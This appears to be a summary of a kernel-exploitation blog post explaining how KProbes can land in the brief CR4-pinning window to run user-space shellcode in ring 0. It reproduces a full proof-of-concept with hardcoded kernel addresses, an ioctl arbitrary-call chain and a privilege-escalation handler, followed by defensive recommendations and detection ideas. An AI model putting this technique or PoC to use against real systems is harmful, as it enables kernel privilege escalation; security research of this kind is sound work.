Executive Summary
Andrey Konovalov’s 2017 Project Zero write-up showed a clean way to turn a control-flow hijack on the Linux kernel into shellcode execution: pivot into native_write_cr4 with RDI set to a value that clears SMEP and SMAP, then return to a user-space buffer. CR Pinning, introduced upstream in 2019, killed that exact trick: native_write_cr4 now compares the value just written to a pinned mask and, if the protected bits differ, loops back and re-writes the correct ones before returning.
This post revives the technique. The author observes that there is a real architectural window between the mov %rsi, %cr4 instruction and the fixup branch — a handful of instructions where SMEP and SMAP are still cleared. Plain preemption inside that window is unrealistic, but KProbes lets you put a software breakpoint exactly there, and have your KProbe handler do whatever you want before control ever reaches the fixup. The whole exploit becomes two control-flow hijacks: one to set up the probe with attacker-controlled data, one to take the bait and execute user-supplied shellcode in ring 0 with the protections off. The post ends with a working PoC against a custom CTF-style kernel module.
The starting point is the original primitive: a kernel control-flow hijack where the attacker controls RIP and at least one register-passed argument. The 2017 PoC pointed RIP at native_write_cr4 with RDI set to a value missing the X86_CR4_SMEP and X86_CR4_SMAP bits, then returned to a user-space stub that did the rest. Modern Linux still has the same function, but the source now looks like this — the snippet below is reproduced verbatim:
static const unsigned long cr4_pinned_mask = X86_CR4_SMEP | X86_CR4_SMAP | X86_CR4_UMIP |
                                             X86_CR4_FSGSBASE | X86_CR4_CET | X86_CR4_FRED;
static DEFINE_STATIC_KEY_FALSE_RO(cr_pinning);
static unsigned long cr4_pinned_bits __ro_after_init;

void __no_profile native_write_cr4(unsigned long val)
{
    unsigned long bits_changed = 0;

set_register:
    asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

    if (static_branch_likely(&cr_pinning)) {
        if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
            bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
            val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
            goto set_register;
        }
        WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
                  bits_changed);
    }
}
Source: original article.
The set_register: label is the heart of the mitigation. The CR4 write happens unconditionally; the fixup then checks the pinned bits, builds a corrected val, and gotos back. So SMEP/SMAP really do get cleared — for the few instructions it takes to reach the fixup. Then they get put back. Everything that follows is about being something that runs in those few instructions.
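The fixup arithmetic is easy to check outside the kernel. The following is a minimal user-space sketch, not kernel code: cr4_fixup and struct fixup_result are hypothetical names introduced for illustration, and the pinned mask is reduced to four bits (the kernel's mask also covers CET and FRED). It only computes what the fixup branch would compute for a given written value and never touches a real register.

```c
#include <stdint.h>

/* CR4 bit positions as defined by the x86 architecture. */
#define CR4_UMIP      (1ULL << 11)
#define CR4_FSGSBASE  (1ULL << 16)
#define CR4_SMEP      (1ULL << 20)
#define CR4_SMAP      (1ULL << 21)

/* Assumption: a reduced pinned mask for illustration only. */
#define PINNED_MASK   (CR4_SMEP | CR4_SMAP | CR4_UMIP | CR4_FSGSBASE)

struct fixup_result {
    uint64_t bits_changed; /* pinned bits that differed from the pinned value */
    uint64_t corrected;    /* value the second CR4 write would use */
};

/* Hypothetical helper: the comparison and correction from the fixup
 * branch, without the register write or the loop. */
struct fixup_result cr4_fixup(uint64_t val, uint64_t pinned_bits)
{
    struct fixup_result r = { 0, val };

    if ((val & PINNED_MASK) != pinned_bits) {
        r.bits_changed = (val & PINNED_MASK) ^ pinned_bits;
        r.corrected = (val & ~PINNED_MASK) | pinned_bits;
    }
    return r;
}
```

Calling cr4_fixup(0x450ef0, PINNED_MASK), that is, with the value that appears as pa2.a0 in the PoC and with all four pinned bits assumed set on the machine, gives bits_changed = 0x300000 (SMEP and SMAP) and corrected = 0x750ef0. In the real function the uncorrected value is already live in CR4 by the time this arithmetic runs, which is the whole point of the section.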
Mind The Gap
The author first reaches for the obvious idea: cause a preemption inside the window. On a preemptible kernel, an IRQ or a forced reschedule between mov %rsi, %cr4 and the comparison would let user space run with SMEP and SMAP cleared. This does not work in practice: the window is only a handful of instructions wide, and there is no reliable way to land precisely there from a user-controlled trigger. So the question becomes: is there any way to deterministically redirect control out of the window before the fixup loops back?
The post points out that the same instruction sequence appears elsewhere in the kernel — for example in sev_verify_cbit, which has its own mov ..., cr4 followed by a short tail. The disassembly reproduced from the original is below:
<sev_verify_cbit+69>: mov cr4,rsi
<sev_verify_cbit+72>: je 0xffffffff810003f7 <sev_verify_cbit+87>
<sev_verify_cbit+74>: xor rsp,rsp
<sev_verify_cbit+77>: sub rsp,0x1000
<sev_verify_cbit+84>: hlt
<sev_verify_cbit+85>: jmp 0xffffffff810003f4 <sev_verify_cbit+84>
<sev_verify_cbit+87>: mov rax,rdi
<sev_verify_cbit+90>: jmp 0xffffffff82142cc0 <srso_alias_return_thunk>
Source: original article.
The shape is exactly the same: a mov ..., cr4 followed by control-flow instructions. The author’s reframe of the problem is the load-bearing insight: you do not need to land in the window by accident, and you do not need to wait for an interrupt — you can ask the kernel itself to put a software breakpoint there, and arrange for the breakpoint handler to do what you want.
KProbing
The mechanism is KProbes. From inside the kernel, register_kprobe takes a struct kprobe with three fields the technique cares about: addr (the instruction to break on), pre_handler (a callback fired before that instruction executes), and post_handler (a callback fired after). KProbes patches the target instruction with an int3 at registration time; when execution reaches the patched site, the breakpoint fires, the kernel saves the trapped registers in a struct pt_regs, and the handler is invoked with the struct kprobe pointer as its first argument (RDI) and that pt_regs pointer as its second (RSI).
The plan, then, is:
- Set the probe’s addr to an instruction inside the gap, somewhere between the mov %rsi, %cr4 and the fixup’s goto set_register. (Or, equivalently, inside sev_verify_cbit at the same offset relative to its own mov ..., cr4.) When the breakpoint fires, SMEP and SMAP are still cleared in CR4 because the fixup has not run yet.
- Set the probe’s pre_handler to an attacker-supplied address: in the PoC, a user-space function that the kernel calls with the struct kprobe pointer in RDI and the pt_regs pointer in RSI. With SMEP and SMAP cleared, the call into a user-space handler from kernel mode actually works.
- Inside the handler, do whatever the original 2017 trick wanted to do: commit_creds(prepare_kernel_cred(0)), read /flag, spawn a shell. The handler runs in ring 0 (it is a kernel call, even if the target page is user-space), so it has full kernel privileges; the only reason the kernel can execute user-space code at all is that SMEP is currently off.
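The ordering that the plan above relies on can be seen in a toy model. This is a user-space sketch under loud assumptions: struct toy_cpu, toy_write_cr4, and record_cr4 are hypothetical names, the "CR4" is an ordinary integer, and the hook is a plain function pointer standing in for a breakpoint placed right after the register write. It shows only that a callback running between the write and the comparison observes the uncorrected value.

```c
#include <stddef.h>
#include <stdint.h>

#define CR4_SMEP (1ULL << 20)
#define CR4_SMAP (1ULL << 21)
#define PINNED   (CR4_SMEP | CR4_SMAP)

/* Toy CPU state: a simulated CR4 plus an optional hook that stands in
 * for a breakpoint located just after the register write. */
struct toy_cpu {
    uint64_t cr4;
    void (*probe)(struct toy_cpu *cpu, void *ctx); /* hypothetical hook */
    void *ctx;
};

/* Mirrors the write-then-fix-up order: write, hook fires, compare,
 * correct, loop back. */
void toy_write_cr4(struct toy_cpu *cpu, uint64_t val)
{
    for (;;) {
        cpu->cr4 = val;                 /* the unconditional write */
        if (cpu->probe)
            cpu->probe(cpu, cpu->ctx);  /* runs inside the window */
        if ((val & PINNED) == PINNED)
            return;
        val |= PINNED;                  /* fixup, then write again */
    }
}

/* Example hook: records the simulated CR4 value seen at each hit. */
struct seen {
    uint64_t values[4];
    size_t n;
};

void record_cr4(struct toy_cpu *cpu, void *ctx)
{
    struct seen *s = ctx;

    if (s->n < 4)
        s->values[s->n++] = cpu->cr4;
}
```

With record_cr4 installed and toy_write_cr4 called on 0x450ef0, the hook fires twice: the first recorded value has SMEP and SMAP clear, the second has them restored, and the final simulated CR4 is 0x750ef0. A caller that only looks at the register after the function returns never sees the first value.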
That gets shellcode running in the gap. The cost is that register_kprobe needs an actual struct kprobe — specifically a kernel-resident struct kprobe — whose fields the attacker controls. That is the next problem the post solves.
Arguments
The starting primitive is a controlled call (RIP, RDI), where RDI is whatever the attacker put there. To call register_kprobe(&kp), the attacker needs RDI to point at a struct kprobe whose addr, pre_handler, and post_handler they fully control — and the struct has to be in kernel memory, because register_kprobe dereferences it before any of the shellcode mechanics can help.
The post uses two ideas to bridge that gap:
- A useful gadget called devm_action_release, whose signature ends up doing roughly “call action(data) on caller-supplied arguments,” effectively turning a single arbitrary-call primitive into a two-argument call: the attacker can pass both a target function address and a data pointer in a controlled way.
- The NPerm technique (by n132, originally demonstrated for CVE-2025-38477) for getting attacker-controlled bytes into a known-address kernel allocation. NPerm gives the exploit a predictable kernel address it can write structured data into and then point the kernel at; in this case, two struct pc_arg records and a fully-populated struct kprobe.
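The “call action(data)” shape can be modelled in a few lines of user-space C. This is a sketch that assumes the gadget ignores its first argument and treats its second as a record holding a data pointer followed by a function pointer, which is what the a0-then-pc field order of the PoC's struct pc_arg suggests. The names struct action_rec, model_action_release, and remember are hypothetical and exist only for this illustration.

```c
/* Same field order as the PoC's struct pc_arg: data first, then target. */
struct action_rec {
    void *data;
    void (*action)(void *);
};

/* Model of the dispatch: the first argument is unused, the second is
 * read as a record and its action is invoked on its data. */
void model_action_release(void *dev, void *res)
{
    struct action_rec *rec = res;

    (void)dev;
    rec->action(rec->data);
}

/* Stand-in target so the indirect call can be observed. */
int last_seen;

void remember(void *data)
{
    last_seen = *(int *)data;
}
```

Pointing the second argument at a record { &value, remember } makes model_action_release call remember(&value). The caller chooses only where the record lives; the record's contents choose both the callee and its argument, which is why staging the record in memory at a known address matters.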
With NPerm staging the data and devm_action_release turning a one-arg call into a two-arg call, the exploit can:
- Use the first control-flow hijack to call register_kprobe with RDI pointing at the staged struct kprobe, registering a probe whose addr is an instruction in the CR4 gap and whose pre_handler is a user-space function.
- Use the second control-flow hijack to call a function that actually executes the mov ..., cr4 (e.g. native_write_cr4 itself, or sev_verify_cbit), tripping the probe.
That is the “two-shot” from the title.
Draw the Rest of the Owl
The PoC ties it together. It opens /proc/dbg-mod (the test driver providing the arbitrary-call primitive via an ioctl), uses NPerm to stage a payload at a guessed kernel address (0xffffffff84c11000) containing a fully-formed struct kprobe plus two struct pc_arg records, and then fires the two ioctl calls. Each ioctl hands devm_action_release a different (pc, a0) pair so the two control-flow hijacks do two different things: the first registers the probe, the second triggers it. The full PoC is reproduced verbatim from the original:
struct pc_arg {
    u64 a0;
    u64 pc;
};

struct nperm_payload {
    struct kprobe kp;
    struct pc_arg pa1;
    struct pc_arg pa2;
};

void from_kernel() {
    int uid = getuid();
    char flag[0x20] = {0};
    int flag_fd = open("/flag", O_RDONLY);
    read(flag_fd, flag, sizeof(flag));
    write(1, flag, sizeof(flag));
    while (1) {}
}

int main(int argc, char **argv) {
    struct arb_call_req req;
    u64 kaslr_base = 0xffffffff81000000;
    u32 dbg = open("/proc/dbg-mod", 2);
    sandbox();
    save_state();
    u64 nperm_addr_guess = 0xffffffff84c11000;
    struct nperm_payload payload = {
        .kp = {
            .addr = (void *)0xffffffff8107220e,
            .pre_handler = escalate_privs,
            .post_handler = (void *)0xdeadbeefcafeb0ba,
        },
        .pa1 = {
            .pc = 0xffffffff812542d0,
            .a0 = nperm_addr_guess,
        },
        .pa2 = {
            .pc = 0xffffffff81072200,
            .a0 = 0x450ef0,
        },
    };
    nperm(&payload, sizeof(payload));
    u64 devm_action_release = 0xffffffff81b24770;
    req.pc = devm_action_release;
    req.a0 = 0xdeadbeef;
    req.a1 = nperm_addr_guess + offsetof(struct nperm_payload, pa1);
    ioctl(dbg, 1337, &req);
    req.pc = devm_action_release;
    req.a0 = 0xdeadbeef;
    req.a1 = nperm_addr_guess + offsetof(struct nperm_payload, pa2);
    ioctl(dbg, 1337, &req);
    return 0;
}
Source: original article.
The shape lines up with what the prose described: kp.addr is an instruction inside the CR4 gap, kp.pre_handler is escalate_privs (the attacker’s user-mode handler), pa1 hands devm_action_release the arguments needed to register the probe, and pa2 hands it the arguments needed to call into the function containing the probed instruction. Two ioctls, two control-flow hijacks; afterwards, escalate_privs runs in ring 0 with SMEP/SMAP cleared, and from_kernel reads /flag.
Conclusion (Original)
The post closes with two reflections worth carrying forward. First, the trick generalises: anywhere the kernel writes a security-relevant CPU register and then fixes it up in software, there is a window between the write and the fixup. CR4 pinning is the cleanest example, but the same structure exists for CR0 pinning and arguably for any “write, then validate” mitigation. Second, the author calls out that pt_regs-driven chaining (i.e., using the breakpoint-saved pt_regs as a vehicle to chain into further primitives) has practical limits because not every register is preserved through the trap path; this is where the author coins the half-joking term KPOP (KProbe-Oriented Programming) as a future direction, and notes the limitations they ran into when trying to chain further useful side effects through it.
Key Takeaways
- CR4 pinning kills the literal 2017 Konovalov trick (point RIP at native_write_cr4, RDI at a value without SMEP/SMAP, return to user-space), but only because the fixup loop puts the bits back. The window in between still has SMEP/SMAP cleared.
- KProbes is a perfect vehicle for landing deterministically inside that window: it patches the target instruction with int3 and runs an attacker-supplied pre_handler, which receives the pt_regs* as its second argument (RSI), before the original instruction executes.
- Inside the handler, SMEP is still off, so calling a user-mode function from kernel context works; the “handler” can simply be a user-space pointer that does the credential-promotion and reads the flag.
- The supporting primitives are devm_action_release (one-arg arbitrary-call promoted to a two-arg call) and the NPerm technique (n132, used for CVE-2025-38477) for placing a fully-formed struct kprobe at a known kernel address.
- The exploit becomes two control-flow hijacks: one to register the probe, one to trigger it. Hence “two-shot.”
- The same structural pattern (write, then fix up) likely exists for other pinned-register mitigations and is worth checking for analogous gadgets.
- pt_regs-driven chaining (“KPOP”) is real but not free: not every register survives the trap path cleanly.
Defensive Recommendations
- Disable KProbes in production kernels wherever your threat model allows. CONFIG_KPROBES=n removes register_kprobe entirely and breaks this specific bridge. If you need it for instrumentation, keep probes disarmed at runtime through the debugfs switch /sys/kernel/debug/kprobes/enabled and audit who can flip it.
- Set kernel.unprivileged_bpf_disabled and lock down other in-kernel callback-registration paths (BPF, tracepoint registration, perf events) for non-root contexts; the technique generalises to anywhere you can register an attacker-supplied callback to fire inside a guarded code window.
- Treat the “write-then-fix-up” mitigation pattern as a known gap. If you maintain a fork or write similar mitigations, prefer an unconditional restoration sequence with no instructions between the write and the recompare, or wrap the entire sequence in local_irq_save/preempt_disable and an explicit BUG_ON on detected divergence so even an arbitrary trap landing in the window is fatal rather than exploitable.
- Make devm_action_release-class “call function with data” gadgets harder to abuse. Audit the kernel for one-arg arbitrary-call wrappers that effectively promote to two-arg calls; consider control-flow integrity (CFI/kCFI) configurations that include indirect-call type checking.
- Adopt FineIBT / kCFI and Shadow Stack on x86 where supported. They do not directly close this window, but they raise the cost of acquiring the underlying control-flow-hijack primitive in the first place.
- Monitor for the precondition. If your detection stack can see register_kprobe calls from unexpected callers or KProbe registrations whose handlers point to non-kernel addresses, alert; both are extraordinarily anomalous on a production endpoint.
- Keep KASLR aggressive and combine it with FG-KASLR / function-granular randomisation where possible. The PoC happily uses known addresses; in the field, an attacker without a KASLR leak does not get to write “0xffffffff8107220e” into a struct kprobe.
- Track CVE-2025-38477-class NPerm-style primitives in your patching workflow. The technique here leans on a separate primitive that lets the attacker place structured data at a known kernel address; cutting off that primitive removes a critical stepping stone.
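The monitoring item above comes down to a simple address test once a tool has the registration data in hand. The following is a minimal sketch under stated assumptions: struct probe_event is a hypothetical record of what a detection stack might capture (how it is captured is out of scope here), and the check uses only the architectural fact that canonical x86-64 kernel addresses have the top bit set while canonical user addresses have it clear.

```c
#include <stdbool.h>
#include <stdint.h>

/* Canonical x86-64 kernel addresses live in the upper half of the
 * address space (top bit set); user addresses live in the lower half. */
bool in_kernel_half(uint64_t addr)
{
    return (addr >> 63) != 0;
}

/* Hypothetical view of one probe registration as seen by a monitor. */
struct probe_event {
    uint64_t addr;         /* probed instruction */
    uint64_t pre_handler;  /* 0 if unset */
    uint64_t post_handler; /* 0 if unset */
};

/* Flags registrations whose handlers point outside the kernel half. */
bool probe_event_suspicious(const struct probe_event *ev)
{
    if (ev->pre_handler && !in_kernel_half(ev->pre_handler))
        return true;
    if (ev->post_handler && !in_kernel_half(ev->post_handler))
        return true;
    return false;
}
```

An event with a pre_handler such as 0x401000 (an illustrative user-space address) is flagged, while one whose handlers sit in the 0xffffffff8... range is not. The top-bit test is deliberately coarse: it accepts non-canonical values such as the PoC's placeholder post_handler, so a production check would more likely compare handlers against the actual kernel and module text ranges.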
Conclusion
The 2017 Project Zero technique is not dead — it is one trap-handler away. CR pinning solved the wrong half of the problem: it makes the wrong CR4 value transient rather than impossible, and the entire exploitation surface lives in the time it takes the fixup loop to come around. KProbes turns that time window into a deterministic entry point, NPerm provides the kernel-addressable scratch space, and a small chain on top of a single arbitrary-call primitive does the rest. The broader lesson for kernel hardening: write-then-validate is structurally weaker than validate-then-write, and any mitigation that uses the former should assume an attacker can land code precisely between the two halves.
Original text: “Revisiting Two-Shot Kernel Shellcode Execution From Control Flow Hijacking” by zolutal at zolutal’s blog.

